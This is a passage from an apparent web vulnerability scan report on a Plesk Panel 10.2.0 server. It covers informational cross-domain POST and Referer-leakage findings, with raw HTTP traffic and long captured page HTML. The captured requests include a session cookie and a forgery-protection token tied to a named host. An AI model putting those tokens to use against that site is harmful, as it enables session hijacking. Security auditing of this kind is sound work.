new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

7. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/register-domain/

Issue detail

The page contains a form which POSTs data to the domain myplesk.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /plesk/client@2/register-domain/?cmd=doms_reg&mpc_connect=true HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/add-domain/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:24:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:24:26 GMT
Connection: close
Content-Length: 882

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=7"/></head>
<body onLoad="document.forms[0].submit()">
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9pt; color: #000000"> Contacting service, please wait ...
<form action="https://myplesk.com/master/handler2.php" method="post"><input type="hidden" name="data" value="U2FsdGVkX1%2FyIGe%2FjsHNpR7puuVkQC7nDLmcHh6hDUSa1t2iYWWYagumHhJ4BiUL%0AU%2BlyN31QdiUGmPELiqbWC4xq6STnuIMAxDSGAS9W6CkFbBM8POKmB%2F81dYVDjABz%0AiboBj0hHQiBlip8P45nsgVTYMN4boTPKrE0t7wvHbeT3pQ66qlcXD5TnIoecW2U7%0A5NEDpxWTUNr%2B7Qluqt%2FqmtE6duMjNgv9lpiZICoXc7seKJYgoyu0wu8TInrpEtVZ%0AL5DB2PPmUp4FT6gPp45EhgO9UI6NvdfygVQ%2F%2FgcyHXGYbH%2FTsCHTxAkti1DHlp09%0AsfFYrtDZ2CIOanHNwkhbuO7UT6zllZKDj85BYODmSFw%3D">
</form>
</body>
</html>

8. Cross-domain Referer leakage  previous  next
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 54609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, 